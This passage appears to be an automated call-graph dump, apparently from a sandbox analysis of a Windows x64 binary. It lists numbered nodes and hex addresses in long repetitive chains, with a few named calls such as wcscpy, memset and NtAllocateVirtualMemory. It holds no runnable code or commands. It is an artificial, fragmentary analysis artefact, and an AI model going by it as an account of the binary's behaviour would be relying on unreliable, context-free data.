calls 3542->3544 3545 7ff6cd201394 2 API calls 3543->3545 3544->3543 3546 7ff6cd2014d6 3545->3546 3547 7ff6cd201394 2 API calls 3546->3547 3548 7ff6cd2014e0 3547->3548 3549 7ff6cd2014e5 3548->3549 3550 7ff6cd201394 2 API calls 3548->3550 3551 7ff6cd201394 2 API calls 3549->3551 3550->3549 3552 7ff6cd2014ef 3551->3552 3553 7ff6cd2014f4 3552->3553 3554 7ff6cd201394 2 API calls 3552->3554 3555 7ff6cd201394 2 API calls 3553->3555 3554->3553 3556 7ff6cd2014fe 3555->3556 3557 7ff6cd201394 2 API calls 3556->3557 3558 7ff6cd201503 3557->3558 3559 7ff6cd201394 2 API calls 3558->3559 3560 7ff6cd201512 3559->3560 3561 7ff6cd201394 2 API calls 3560->3561 3562 7ff6cd201521 3561->3562 3563 7ff6cd201530 3562->3563 3564 7ff6cd201394 2 API calls 3562->3564 3565 7ff6cd201394 2 API calls 3563->3565 3564->3563 3566 7ff6cd20153a 3565->3566 3567 7ff6cd20153f 3566->3567 3568 7ff6cd201394 2 API calls 3566->3568 3569 7ff6cd201394 2 API calls 3567->3569 3568->3567 3570 7ff6cd20154e 3569->3570 3571 7ff6cd201394 2 API calls 3570->3571 3572 7ff6cd201558 3571->3572 3573 7ff6cd20155d 3572->3573 3574 7ff6cd201394 2 API calls 3572->3574 3575 7ff6cd201394 2 API calls 3573->3575 3574->3573 3576 7ff6cd201567 3575->3576 3577 7ff6cd20156c 3576->3577 3578 7ff6cd201394 2 API calls 3576->3578 3579 7ff6cd201394 2 API calls 3577->3579 3578->3577 3580 7ff6cd201576 3579->3580 3581 7ff6cd20157b 3580->3581 3582 7ff6cd201394 2 API calls 3580->3582 3583 7ff6cd201394 2 API calls 3581->3583 3582->3581 3584 7ff6cd201585 3583->3584 3585 7ff6cd20158a 3584->3585 3586 7ff6cd201394 2 API calls 3584->3586 3587 7ff6cd201394 2 API calls 3585->3587 3586->3585 3588 7ff6cd201599 3587->3588 3589 7ff6cd201394 2 API calls 3588->3589 3590 7ff6cd2015a3 3589->3590 3591 7ff6cd2015a8 3590->3591 3592 7ff6cd201394 2 API calls 3590->3592 3593 7ff6cd201394 2 API calls 3591->3593 3592->3591 3594 7ff6cd2015b7 3593->3594 3595 7ff6cd201394 2 API calls 3594->3595 3596 7ff6cd2015c1 3595->3596 3597 7ff6cd2015c6 3596->3597 3598 7ff6cd201394 2 API calls 3596->3598 3599 7ff6cd201394 2 API calls 3597->3599 3598->3597 3600 7ff6cd2015d0 3599->3600 3601 7ff6cd2015d5 3600->3601 3602 7ff6cd201394 2 API calls 3600->3602 3603 7ff6cd201394 2 API calls 3601->3603 3602->3601 3604 7ff6cd2015df 3603->3604 3605 7ff6cd2015e4 3604->3605 3606 7ff6cd201394 2 API calls 3604->3606 3607 7ff6cd201394 2 API calls 3605->3607 3606->3605 3608 7ff6cd2015f3 3607->3608 3608->3050 3610 7ff6cd201394 2 API calls 3609->3610 3611 7ff6cd201585 3610->3611 3612 7ff6cd20158a 3611->3612 3613 7ff6cd201394 2 API calls 3611->3613 3614 7ff6cd201394 2 API calls 3612->3614 3613->3612 3615 7ff6cd201599 3614->3615 3616 7ff6cd201394 2 API calls 3615->3616 3617 7ff6cd2015a3 3616->3617 3618 7ff6cd2015a8 3617->3618 3619 7ff6cd201394 2 API calls 3617->3619 3620 7ff6cd201394 2 API calls 3618->3620 3619->3618 3621 7ff6cd2015b7 3620->3621 3622 7ff6cd201394 2 API calls 3621->3622 3623 7ff6cd2015c1 3622->3623 3624 7ff6cd2015c6 3623->3624 3625 7ff6cd201394 2 API calls 3623->3625 3626 7ff6cd201394 2 API calls 3624->3626 3625->3624 3627 7ff6cd2015d0 3626->3627 3628 7ff6cd2015d5 3627->3628 3629 7ff6cd201394 2 API calls 3627->3629 3630 7ff6cd201394 2 API calls 3628->3630 3629->3628 3631 7ff6cd2015df 3630->3631 3632 7ff6cd2015e4 3631->3632 3633 7ff6cd201394 2 API calls 3631->3633 3634 7ff6cd201394 2 API calls 3632->3634 3633->3632 3635 7ff6cd2015f3 3634->3635 3635->3058 3636 7ff6cd20158a 3635->3636 3637 7ff6cd201394 2 API calls 3636->3637 3638 7ff6cd201599 3637->3638 3639 7ff6cd201394 2 API calls 3638->3639 3640 7ff6cd2015a3 3639->3640 3641 7ff6cd2015a8 3640->3641 3642 7ff6cd201394 2 API calls 3640->3642 3643 7ff6cd201394 2 API calls 3641->3643 3642->3641 3644 7ff6cd2015b7 3643->3644 3645 7ff6cd201394 2 API calls 3644->3645 3646 7ff6cd2015c1 3645->3646 3647 7ff6cd2015c6 3646->3647 3648 7ff6cd201394 2 API calls 3646->3648 3649 7ff6cd201394 2 API calls 3647->3649 3648->3647 3650 7ff6cd2015d0 3649->3650 3651 7ff6cd2015d5 3650->3651 3652 7ff6cd201394 2 API calls 3650->3652 3653 7ff6cd201394 2 API calls 3651->3653 3652->3651 3654 7ff6cd2015df 3653->3654 3655 7ff6cd2015e4 3654->3655 3656 7ff6cd201394 2 API calls 3654->3656 3657 7ff6cd201394 2 API calls 3655->3657 3656->3655 3658 7ff6cd2015f3 3657->3658 3658->3058 3660 7ff6cd201394 2 API calls 3659->3660 3661 7ff6cd2015f3 3660->3661 3661->3063 3663 7ff6cd201394 2 API calls 3662->3663 3664 7ff6cd2015b7 3663->3664 3665 7ff6cd201394 2 API calls 3664->3665 3666 7ff6cd2015c1 3665->3666 3667 7ff6cd2015c6 3666->3667 3668 7ff6cd201394 2 API calls 3666->3668 3669 7ff6cd201394 2 API calls 3667->3669 3668->3667 3670 7ff6cd2015d0 3669->3670 3671 7ff6cd2015d5 3670->3671 3672 7ff6cd201394 2 API calls 3670->3672 3673 7ff6cd201394 2 API calls 3671->3673 3672->3671 3674 7ff6cd2015df 3673->3674 3675 7ff6cd2015e4 3674->3675 3676 7ff6cd201394 2 API calls 3674->3676 3677 7ff6cd201394 2 API calls 3675->3677 3676->3675 3678 7ff6cd2015f3 3677->3678 3678->3081 3678->3082 3680 7ff6cd201394 2 API calls 3679->3680 3681 7ff6cd20153a 3680->3681 3682 7ff6cd20153f 3681->3682 3683 7ff6cd201394 2 API calls 3681->3683 3684 7ff6cd201394 2 API calls 3682->3684 3683->3682 3685 7ff6cd20154e 3684->3685 3686 7ff6cd201394 2 API calls 3685->3686 3687 7ff6cd201558 3686->3687 3688 7ff6cd20155d 3687->3688 3689 7ff6cd201394 2 API calls 3687->3689 3690 7ff6cd201394 2 API calls 3688->3690 3689->3688 3691 7ff6cd201567 3690->3691 3692 7ff6cd20156c 3691->3692 3693 7ff6cd201394 2 API calls 3691->3693 3694 7ff6cd201394 2 API calls 3692->3694 3693->3692 3695 7ff6cd201576 3694->3695 3696 7ff6cd20157b 3695->3696 3697 7ff6cd201394 2 API calls 3695->3697 3698 7ff6cd201394 2 API calls 3696->3698 3697->3696 3699 7ff6cd201585 3698->3699 3700 7ff6cd20158a 3699->3700 3701 7ff6cd201394 2 API calls 3699->3701 3702 7ff6cd201394 2 API calls 3700->3702 3701->3700 3703 7ff6cd201599 3702->3703 3704 7ff6cd201394 2 API calls 3703->3704 3705 7ff6cd2015a3 3704->3705 3706 7ff6cd2015a8 3705->3706 3707 7ff6cd201394 2 API calls 3705->3707 3708 7ff6cd201394 2 API calls 3706->3708 3707->3706 3709 7ff6cd2015b7 3708->3709 3710 7ff6cd201394 2 API calls 3709->3710 3711 7ff6cd2015c1 3710->3711 3712 7ff6cd2015c6 3711->3712 3713 7ff6cd201394 2 API calls 3711->3713 3714 7ff6cd201394 2 API calls 3712->3714 3713->3712 3715 7ff6cd2015d0 3714->3715 3716 7ff6cd2015d5 3715->3716 3717 7ff6cd201394 2 API calls 3715->3717 3718 7ff6cd201394 2 API calls 3716->3718 3717->3716 3719 7ff6cd2015df 3718->3719 3720 7ff6cd2015e4 3719->3720 3721 7ff6cd201394 2 API calls 3719->3721 3722 7ff6cd201394 2 API calls 3720->3722 3721->3720 3723 7ff6cd2015f3 3722->3723 3723->3105 3723->3106 3725 7ff6cd201394 2 API calls 3724->3725 3726 7ff6cd2014b3 3725->3726 3727 7ff6cd2014b8 3726->3727 3728 7ff6cd201394 2 API calls 3726->3728 3729 7ff6cd201394 2 API calls 3727->3729 3728->3727 3730 7ff6cd2014c2 3729->3730 3731 7ff6cd2014c7 3730->3731 3732 7ff6cd201394 2 API calls 3730->3732 3733 7ff6cd201394 2 API calls 3731->3733 3732->3731 3734 7ff6cd2014d6 3733->3734 3735 7ff6cd201394 2 API calls 3734->3735 3736 7ff6cd2014e0 3735->3736 3737 7ff6cd2014e5 3736->3737 3738 7ff6cd201394 2 API calls 3736->3738 3739 7ff6cd201394 2 API calls 3737->3739 3738->3737 3740 7ff6cd2014ef 3739->3740 3741 7ff6cd2014f4 3740->3741 3742 7ff6cd201394 2 API calls 3740->3742 3743 7ff6cd201394 2 API calls 3741->3743 3742->3741 3744 7ff6cd2014fe 3743->3744 3745 7ff6cd201394 2 API calls 3744->3745 3746 7ff6cd201503 3745->3746 3747 7ff6cd201394 2 API calls 3746->3747 3748 7ff6cd201512 3747->3748 3749 7ff6cd201394 2 API calls 3748->3749 3750 7ff6cd201521 3749->3750 3751 7ff6cd201530 3750->3751 3752 7ff6cd201394 2 API calls 3750->3752 3753 7ff6cd201394 2 API calls 3751->3753 3752->3751 3754 7ff6cd20153a 3753->3754 3755 7ff6cd20153f 3754->3755 3756 7ff6cd201394 2 API calls 3754->3756 3757 7ff6cd201394 2 API calls 3755->3757 3756->3755 3758 7ff6cd20154e 3757->3758 3759 7ff6cd201394 2 API calls 3758->3759 3760 7ff6cd201558 3759->3760 3761 7ff6cd20155d 3760->3761 3762 7ff6cd201394 2 API calls 3760->3762 3763 7ff6cd201394 2 API calls 3761->3763 3762->3761 3764 7ff6cd201567 3763->3764 3765 7ff6cd20156c 3764->3765 3766 7ff6cd201394 2 API calls 3764->3766 3767 7ff6cd201394 2 API calls 3765->3767 3766->3765 3768 7ff6cd201576 3767->3768 3769 7ff6cd20157b 3768->3769 3770 7ff6cd201394 2 API calls 3768->3770 3771 7ff6cd201394 2 API calls 3769->3771 3770->3769 3772 7ff6cd201585 3771->3772 3773 7ff6cd20158a 3772->3773 3774 7ff6cd201394 2 API calls 3772->3774 3775 7ff6cd201394 2 API calls 3773->3775 3774->3773 3776 7ff6cd201599 3775->3776 3777 7ff6cd201394 2 API calls 3776->3777 3778 7ff6cd2015a3 3777->3778 3779 7ff6cd2015a8 3778->3779 3780 7ff6cd201394 2 API calls 3778->3780 3781 7ff6cd201394 2 API calls 3779->3781 3780->3779 3782 7ff6cd2015b7 3781->3782 3783 7ff6cd201394 2 API calls 3782->3783 3784 7ff6cd2015c1 3783->3784 3785 7ff6cd2015c6 3784->3785 3786 7ff6cd201394 2 API calls 3784->3786 3787 7ff6cd201394 2 API calls 3785->3787 3786->3785 3788 7ff6cd2015d0 3787->3788 3789 7ff6cd2015d5 3788->3789 3790 7ff6cd201394 2 API calls 3788->3790 3791 7ff6cd201394 2 API calls 3789->3791 3790->3789 3792 7ff6cd2015df 3791->3792 3793 7ff6cd2015e4 3792->3793 3794 7ff6cd201394 2 API calls 3792->3794 3795 7ff6cd201394 2 API calls 3793->3795 3794->3793 3796 7ff6cd2015f3 3795->3796 3796->3115 3797 7ff6cd201440 3796->3797 3798 7ff6cd201394 2 API calls 3797->3798 3799 7ff6cd20144f 3798->3799 3800 7ff6cd201394 2 API calls 3799->3800 3801 7ff6cd201459 3800->3801 3802 7ff6cd20145e 3801->3802 3803 7ff6cd201394 2 API calls 3801->3803 3804 7ff6cd201394 2 API calls 3802->3804 3803->3802 3805 7ff6cd201468 3804->3805 3806 7ff6cd20146d 3805->3806 3807 7ff6cd201394 2 API calls 3805->3807 3808 7ff6cd201394 2 API calls 3806->3808 3807->3806 3809 7ff6cd201477 3808->3809 3810 7ff6cd20147c 3809->3810 3811 7ff6cd201394 2 API calls 3809->3811 3812 7ff6cd201394 2 API calls 3810->3812 3811->3810 3813 7ff6cd201486 3812->3813 3814 7ff6cd20148b 3813->3814 3815 7ff6cd201394 2 API calls 3813->3815 3816 7ff6cd201394 2 API calls 3814->3816 3815->3814 3817 7ff6cd201495 3816->3817 3818 7ff6cd20149a 3817->3818 3819 7ff6cd201394 2 API calls 3817->3819 3820 7ff6cd201394 2 API calls 3818->3820 3819->3818 3821 7ff6cd2014a4 3820->3821 3822 7ff6cd2014a9 3821->3822 3823 7ff6cd201394 2 API calls 3821->3823 3824 7ff6cd201394 2 API calls 3822->3824 3823->3822 3825 7ff6cd2014b3 3824->3825 3826 7ff6cd2014b8 3825->3826 3827 7ff6cd201394 2 API calls 3825->3827 3828 7ff6cd201394 2 API calls 3826->3828 3827->3826 3829 7ff6cd2014c2 3828->3829 3830 7ff6cd2014c7 3829->3830 3831 7ff6cd201394 2 API calls 3829->3831 3832 7ff6cd201394 2 API calls 3830->3832 3831->3830 3833 7ff6cd2014d6 3832->3833 3834 7ff6cd201394 2 API calls 3833->3834 3835 7ff6cd2014e0 3834->3835 3836 7ff6cd2014e5 3835->3836 3837 7ff6cd201394 2 API calls 3835->3837 3838 7ff6cd201394 2 API calls 3836->3838 3837->3836 3839 7ff6cd2014ef 3838->3839 3840 7ff6cd2014f4 3839->3840 3841 7ff6cd201394 2 API calls 3839->3841 3842 7ff6cd201394 2 API calls 3840->3842 3841->3840 3843 7ff6cd2014fe 3842->3843 3844 7ff6cd201394 2 API calls 3843->3844 3845 7ff6cd201503 3844->3845 3846 7ff6cd201394 2 API calls 3845->3846 3847 7ff6cd201512 3846->3847 3848 7ff6cd201394 2 API calls 3847->3848 3849 7ff6cd201521 3848->3849 3850 7ff6cd201530 3849->3850 3851 7ff6cd201394 2 API calls 3849->3851 3852 7ff6cd201394 2 API calls 3850->3852 3851->3850 3853 7ff6cd20153a 3852->3853 3854 7ff6cd20153f 3853->3854 3855 7ff6cd201394 2 API calls 3853->3855 3856 7ff6cd201394 2 API calls 3854->3856 3855->3854 3857 7ff6cd20154e 3856->3857 3858 7ff6cd201394 2 API calls 3857->3858 3859 7ff6cd201558 3858->3859 3860 7ff6cd20155d 3859->3860 3861 7ff6cd201394 2 API calls 3859->3861 3862 7ff6cd201394 2 API calls 3860->3862 3861->3860 3863 7ff6cd201567 3862->3863 3864 7ff6cd20156c 3863->3864 3865 7ff6cd201394 2 API calls 3863->3865 3866 7ff6cd201394 2 API calls 3864->3866 3865->3864 3867 7ff6cd201576 3866->3867 3868 7ff6cd20157b 3867->3868 3869 7ff6cd201394 2 API calls 3867->3869 3870 7ff6cd201394 2 API calls 3868->3870 3869->3868 3871 7ff6cd201585 3870->3871 3872 7ff6cd20158a 3871->3872 3873 7ff6cd201394 2 API calls 3871->3873 3874 7ff6cd201394 2 API calls 3872->3874 3873->3872 3875 7ff6cd201599 3874->3875 3876 7ff6cd201394 2 API calls 3875->3876 3877 7ff6cd2015a3 3876->3877 3878 7ff6cd2015a8 3877->3878 3879 7ff6cd201394 2 API calls 3877->3879 3880 7ff6cd201394 2 API calls 3878->3880 3879->3878 3881 7ff6cd2015b7 3880->3881 3882 7ff6cd201394 2 API calls 3881->3882 3883 7ff6cd2015c1 3882->3883 3884 7ff6cd2015c6 3883->3884 3885 7ff6cd201394 2 API calls 3883->3885 3886 7ff6cd201394 2 API calls 3884->3886 3885->3884 3887 7ff6cd2015d0 3886->3887 3888 7ff6cd2015d5 3887->3888 3889 7ff6cd201394 2 API calls 3887->3889 3890 7ff6cd201394 2 API calls 3888->3890 3889->3888 3891 7ff6cd2015df 3890->3891 3892 7ff6cd2015e4 3891->3892 3893 7ff6cd201394 2 API calls 3891->3893 3894 7ff6cd201394 2 API calls 3892->3894 3893->3892 3895 7ff6cd2015f3 3894->3895 3895->3115 3895->3126 3897 7ff6cd2035c1 memset 3896->3897 3907 7ff6cd2033c3 3896->3907 3899 7ff6cd2035e6 3897->3899 3898 7ff6cd20343a memset 3898->3907 3900 7ff6cd20362b wcscpy wcscat wcslen 3899->3900 3901 7ff6cd201422 2 API calls 3900->3901 3903 7ff6cd203728 3901->3903 3902 7ff6cd203493 wcscpy wcscat wcslen 4241 7ff6cd201422 3902->4241 3905 7ff6cd203767 3903->3905 4348 7ff6cd201431 3903->4348 3912 7ff6cd2014c7 3905->3912 3907->3897 3907->3898 3907->3902 3909 7ff6cd20145e 2 API calls 3907->3909 3911 7ff6cd203579 3907->3911 3909->3907 3910 7ff6cd20145e 2 API calls 3910->3905 3911->3897 3913 7ff6cd201394 2 API calls 3912->3913 3914 7ff6cd2014d6 3913->3914 3915 7ff6cd201394 2 API calls 3914->3915 3916 7ff6cd2014e0 3915->3916 3917 7ff6cd2014e5 3916->3917 3918 7ff6cd201394 2 API calls 3916->3918 3919 7ff6cd201394 2 API calls 3917->3919 3918->3917 3920 7ff6cd2014ef 3919->3920 3921 7ff6cd2014f4 3920->3921 3922 7ff6cd201394 2 API calls 3920->3922 3923 7ff6cd201394 2 API calls 3921->3923 3922->3921 3924 7ff6cd2014fe 3923->3924 3925 7ff6cd201394 2 API calls 3924->3925 3926 7ff6cd201503 3925->3926 3927 7ff6cd201394 2 API calls 3926->3927 3928 7ff6cd201512 3927->3928 3929 7ff6cd201394 2 API calls 3928->3929 3930 7ff6cd201521 3929->3930 3931 7ff6cd201530 3930->3931 3932 7ff6cd201394 2 API calls 3930->3932 3933 7ff6cd201394 2 API calls 3931->3933 3932->3931 3934 7ff6cd20153a 3933->3934 3935 7ff6cd20153f 3934->3935 3936 7ff6cd201394 2 API calls 3934->3936 3937 7ff6cd201394 2 API calls 3935->3937 3936->3935 3938 7ff6cd20154e 3937->3938 3939 7ff6cd201394 2 API calls 3938->3939 3940 7ff6cd201558 3939->3940 3941 7ff6cd20155d 3940->3941 3942 7ff6cd201394 2 API calls 3940->3942 3943 7ff6cd201394 2 API calls 3941->3943 3942->3941 3944 7ff6cd201567 3943->3944 3945 7ff6cd20156c 3944->3945 3946 7ff6cd201394 2 API calls 3944->3946 3947 7ff6cd201394 2 API calls 3945->3947 3946->3945 3948 7ff6cd201576 3947->3948 3949 7ff6cd20157b 3948->3949 3950 7ff6cd201394 2 API calls 3948->3950 3951 7ff6cd201394 2 API calls 3949->3951 3950->3949 3952 7ff6cd201585 3951->3952 3953 7ff6cd20158a 3952->3953 3954 7ff6cd201394 2 API calls 3952->3954 3955 7ff6cd201394 2 API calls 3953->3955 3954->3953 3956 7ff6cd201599 3955->3956 3957 7ff6cd201394 2 API calls 3956->3957 3958 7ff6cd2015a3 3957->3958 3959 7ff6cd2015a8 3958->3959 3960 7ff6cd201394 2 API calls 3958->3960 3961 7ff6cd201394 2 API calls 3959->3961 3960->3959 3962 7ff6cd2015b7 3961->3962 3963 7ff6cd201394 2 API calls 3962->3963 3964 7ff6cd2015c1 3963->3964 3965 7ff6cd2015c6 3964->3965 3966 7ff6cd201394 2 API calls 3964->3966 3967 7ff6cd201394 2 API calls 3965->3967 3966->3965 3968 7ff6cd2015d0 3967->3968 3969 7ff6cd2015d5 3968->3969 3970 7ff6cd201394 2 API calls 3968->3970 3971 7ff6cd201394 2 API calls 3969->3971 3970->3969 3972 7ff6cd2015df 3971->3972 3973 7ff6cd2015e4 3972->3973 3974 7ff6cd201394 2 API calls 3972->3974 3975 7ff6cd201394 2 API calls 3973->3975 3974->3973 3976 7ff6cd2015f3 3975->3976 3976->3142 3978 7ff6cd202f88 3977->3978 3979 7ff6cd2014a9 2 API calls 3978->3979 3980 7ff6cd202fd0 3979->3980 3980->3116 3982 7ff6cd202690 10 API calls 3981->3982 3983 7ff6cd20391e 3982->3983 3984 7ff6cd203b21 3983->3984 3985 7ff6cd2014a9 2 API calls 3983->3985 3984->3127 3986 7ff6cd203967 3985->3986 3987 7ff6cd203b28 3986->3987 4451 7ff6cd2014b8 3986->4451 4770 7ff6cd2015c6 3987->4770 3990 7ff6cd203a87 memset 4527 7ff6cd20148b 3990->4527 3992 7ff6cd2014b8 2 API calls 3994 7ff6cd20398f 3992->3994 3994->3990 3994->3992 4520 7ff6cd2015d5 3994->4520 3998 7ff6cd2014b8 2 API calls 3999 7ff6cd203b07 3998->3999 3999->3987 4000 7ff6cd203b0b 3999->4000 4685 7ff6cd20147c 4000->4685 4003 7ff6cd20145e 2 API calls 4003->3984 4005 7ff6cd208420 malloc 4004->4005 4006 7ff6cd2013b8 4005->4006 4007 7ff6cd2013c6 NtAllocateVirtualMemory 4006->4007 4007->3183 4009 7ff6cd20266f 4008->4009 4009->3399 4009->4009 4092 7ff6cd20155d 4010->4092 4012 7ff6cd2027f4 4013 7ff6cd2014c7 2 API calls 4012->4013 4016 7ff6cd202816 4013->4016 4014 7ff6cd202785 wcsncmp 4127 7ff6cd2014e5 4014->4127 4018 7ff6cd201503 2 API calls 4016->4018 4020 7ff6cd20283d 4018->4020 4019 7ff6cd202d27 4021 7ff6cd202847 memset 4020->4021 4022 7ff6cd202877 4021->4022 4023 7ff6cd2028bc wcscpy wcscat wcslen 4022->4023 4024 7ff6cd2028ee wcslen 4023->4024 4025 7ff6cd20291a 4023->4025 4024->4025 4026 7ff6cd202967 wcslen 4025->4026 4028 7ff6cd202985 4025->4028 4026->4028 4027 7ff6cd2029d9 wcslen 4029 7ff6cd2014a9 2 API calls 4027->4029 4028->4019 4028->4027 4030 7ff6cd202a73 4029->4030 4031 7ff6cd2014a9 2 API calls 4030->4031 4032 7ff6cd202bd2 4031->4032 4186 7ff6cd2014f4 4032->4186 4035 7ff6cd2014c7 2 API calls 4036 7ff6cd202c99 4035->4036 4037 7ff6cd2014c7 2 API calls 4036->4037 4038 7ff6cd202cb1 4037->4038 4039 7ff6cd20145e 2 API calls 4038->4039 4040 7ff6cd202cbb 4039->4040 4041 7ff6cd20145e 2 API calls 4040->4041 4042 7ff6cd202cc5 4041->4042 4042->3402 4044 7ff6cd201394 2 API calls 4043->4044 4045 7ff6cd201521 4044->4045 4046 7ff6cd201530 4045->4046 4047 7ff6cd201394 2 API calls 4045->4047 4048 7ff6cd201394 2 API calls 4046->4048 4047->4046 4049 7ff6cd20153a 4048->4049 4050 7ff6cd20153f 4049->4050 4051 7ff6cd201394 2 API calls 4049->4051 4052 7ff6cd201394 2 API calls 4050->4052 4051->4050 4053 7ff6cd20154e 4052->4053 4054 7ff6cd201394 2 API calls 4053->4054 4055 7ff6cd201558 4054->4055 4056 7ff6cd20155d 4055->4056 4057 7ff6cd201394 2 API calls 4055->4057 4058 7ff6cd201394 2 API calls 4056->4058 4057->4056 4059 7ff6cd201567 4058->4059 4060 7ff6cd20156c 4059->4060 4061 7ff6cd201394 2 API calls 4059->4061 4062 7ff6cd201394 2 API calls 4060->4062 4061->4060 4063 7ff6cd201576 4062->4063 4064 7ff6cd20157b 4063->4064 4065 7ff6cd201394 2 API calls 4063->4065 4066 7ff6cd201394 2 API calls 4064->4066 4065->4064 4067 7ff6cd201585 4066->4067 4068 7ff6cd20158a 4067->4068 4069 7ff6cd201394 2 API calls 4067->4069 4070 7ff6cd201394 2 API calls 4068->4070 4069->4068 4071 7ff6cd201599 4070->4071 4072 7ff6cd201394 2 API calls 4071->4072 4073 7ff6cd2015a3 4072->4073 4074 7ff6cd2015a8 4073->4074 4075 7ff6cd201394 2 API calls 4073->4075 4076 7ff6cd201394 2 API calls 4074->4076 4075->4074 4077 7ff6cd2015b7 4076->4077 4078 7ff6cd201394 2 API calls 4077->4078 4079 7ff6cd2015c1 4078->4079 4080 7ff6cd2015c6 4079->4080 4081 7ff6cd201394 2 API calls 4079->4081 4082 7ff6cd201394 2 API calls 4080->4082 4081->4080 4083 7ff6cd2015d0 4082->4083 4084 7ff6cd2015d5 4083->4084 4085 7ff6cd201394 2 API calls 4083->4085 4086 7ff6cd201394 2 API calls 4084->4086 4085->4084 4087 7ff6cd2015df 4086->4087 4088 7ff6cd2015e4 4087->4088 4089 7ff6cd201394 2 API calls 4087->4089 4090 7ff6cd201394 2 API calls 4088->4090 4089->4088 4091 7ff6cd2015f3 4090->4091 4091->3405 4093 7ff6cd201394 2 API calls 4092->4093 4094 7ff6cd201567 4093->4094 4095 7ff6cd20156c 4094->4095 4096 7ff6cd201394 2 API calls 4094->4096 4097 7ff6cd201394 2 API calls 4095->4097 4096->4095 4098 7ff6cd201576 4097->4098 4099 7ff6cd20157b 4098->4099 4100 7ff6cd201394 2 API calls 4098->4100 4101 7ff6cd201394 2 API calls 4099->4101 4100->4099 4102 7ff6cd201585 4101->4102 4103 7ff6cd20158a 4102->4103 4104 7ff6cd201394 2 API calls 4102->4104 4105 7ff6cd201394 2 API calls 4103->4105 4104->4103 4106 7ff6cd201599 4105->4106 4107 7ff6cd201394 2 API calls 4106->4107 4108 7ff6cd2015a3 4107->4108 4109 7ff6cd2015a8 4108->4109 4110 7ff6cd201394 2 API calls 4108->4110 4111 7ff6cd201394 2 API calls 4109->4111 4110->4109 4112 7ff6cd2015b7 4111->4112 4113 7ff6cd201394 2 API calls 4112->4113 4114 7ff6cd2015c1 4113->4114 4115 7ff6cd2015c6 4114->4115 4116 7ff6cd201394 2 API calls 4114->4116 4117 7ff6cd201394 2 API calls 4115->4117 4116->4115 4118 7ff6cd2015d0 4117->4118 4119 7ff6cd2015d5 4118->4119 4120 7ff6cd201394 2 API calls 4118->4120 4121 7ff6cd201394 2 API calls 4119->4121 4120->4119 4122 7ff6cd2015df 4121->4122 4123 7ff6cd2015e4 4122->4123 4124 7ff6cd201394 2 API calls 4122->4124 4125 7ff6cd201394 2 API calls 4123->4125 4124->4123 4126 7ff6cd2015f3 4125->4126 4126->4012 4126->4014 4126->4019 4128 7ff6cd201394 2 API calls 4127->4128 4129 7ff6cd2014ef 4128->4129 4130 7ff6cd2014f4 4129->4130 4131 7ff6cd201394 2 API calls 4129->4131 4132 7ff6cd201394 2 API calls 4130->4132 4131->4130 4133 7ff6cd2014fe 4132->4133 4134 7ff6cd201394 2 API calls 4133->4134 4135 7ff6cd201503 4134->4135 4136 7ff6cd201394 2 API calls 4135->4136 4137 7ff6cd201512 4136->4137 4138 7ff6cd201394 2 API calls 4137->4138 4139 7ff6cd201521 4138->4139 4140 7ff6cd201530 4139->4140 4141 7ff6cd201394 2 API calls 4139->4141 4142 7ff6cd201394 2 API calls 4140->4142 4141->4140 4143 7ff6cd20153a 4142->4143 4144 7ff6cd20153f 4143->4144 4145 7ff6cd201394 2 API calls 4143->4145 4146 7ff6cd201394 2 API calls 4144->4146 4145->4144 4147 7ff6cd20154e 4146->4147 4148 7ff6cd201394 2 API calls 4147->4148 4149 7ff6cd201558 4148->4149 4150 7ff6cd20155d 4149->4150 4151 7ff6cd201394 2 API calls 4149->4151 4152 7ff6cd201394 2 API calls 4150->4152 4151->4150 4153 7ff6cd201567 4152->4153 4154 7ff6cd20156c 4153->4154 4155 7ff6cd201394 2 API calls 4153->4155 4156 7ff6cd201394 2 API calls 4154->4156 4155->4154 4157 7ff6cd201576 4156->4157 4158 7ff6cd20157b 4157->4158 4159 7ff6cd201394 2 API calls 4157->4159 4160 7ff6cd201394 2 API calls 4158->4160 4159->4158 4161 7ff6cd201585 4160->4161 4162 7ff6cd20158a 4161->4162 4163 7ff6cd201394 2 API calls 4161->4163 4164 7ff6cd201394 2 API calls 4162->4164 4163->4162 4165 7ff6cd201599 4164->4165 4166 7ff6cd201394 2 API calls 4165->4166 4167 7ff6cd2015a3 4166->4167 4168 7ff6cd2015a8 4167->4168 4169 7ff6cd201394 2 API calls 4167->4169 4170 7ff6cd201394 2 API calls 4168->4170 4169->4168 4171 7ff6cd2015b7 4170->4171 4172 7ff6cd201394 2 API calls 4171->4172 4173 7ff6cd2015c1 4172->4173 4174 7ff6cd2015c6 4173->4174 4175 7ff6cd201394 2 API calls 4173->4175 4176 7ff6cd201394 2 API calls 4174->4176 4175->4174 4177 7ff6cd2015d0 4176->4177 4178 7ff6cd2015d5 4177->4178 4179 7ff6cd201394 2 API calls 4177->4179 4180 7ff6cd201394 2 API calls 4178->4180 4179->4178 4181 7ff6cd2015df 4180->4181 4182 7ff6cd2015e4 4181->4182 4183 7ff6cd201394 2 API calls 4181->4183 4184 7ff6cd201394 2 API calls 4182->4184 4183->4182 4185 7ff6cd2015f3 4184->4185 4185->4012 4187 7ff6cd201394 2 API calls 4186->4187 4188 7ff6cd2014fe 4187->4188 4189 7ff6cd201394 2 API calls 4188->4189 4190 7ff6cd201503 4189->4190 4191 7ff6cd201394 2 API calls 4190->4191 4192 7ff6cd201512 4191->4192 4193 7ff6cd201394 2 API calls 4192->4193 4194 7ff6cd201521 4193->4194 4195 7ff6cd201530 4194->4195 4196 7ff6cd201394 2 API calls 4194->4196 4197 7ff6cd201394 2 API calls 4195->4197 4196->4195 4198 7ff6cd20153a 4197->4198 4199 7ff6cd20153f 4198->4199 4200 7ff6cd201394 2 API calls 4198->4200 4201 7ff6cd201394 2 API calls 4199->4201 4200->4199 4202 7ff6cd20154e 4201->4202 4203 7ff6cd201394 2 API calls 4202->4203 4204 7ff6cd201558 4203->4204 4205 7ff6cd20155d 4204->4205 4206 7ff6cd201394 2 API calls 4204->4206 4207 7ff6cd201394 2 API calls 4205->4207 4206->4205 4208 7ff6cd201567 4207->4208 4209 7ff6cd20156c 4208->4209 4210 7ff6cd201394 2 API calls 4208->4210 4211 7ff6cd201394 2 API calls 4209->4211 4210->4209 4212 7ff6cd201576 4211->4212 4213 7ff6cd20157b 4212->4213 4214 7ff6cd201394 2 API calls 4212->4214 4215 7ff6cd201394 2 API calls 4213->4215 4214->4213 4216 7ff6cd201585 4215->4216 4217 7ff6cd20158a 4216->4217 4218 7ff6cd201394 2 API calls 4216->4218 4219 7ff6cd201394 2 API calls 4217->4219 4218->4217 4220 7ff6cd201599 4219->4220 4221 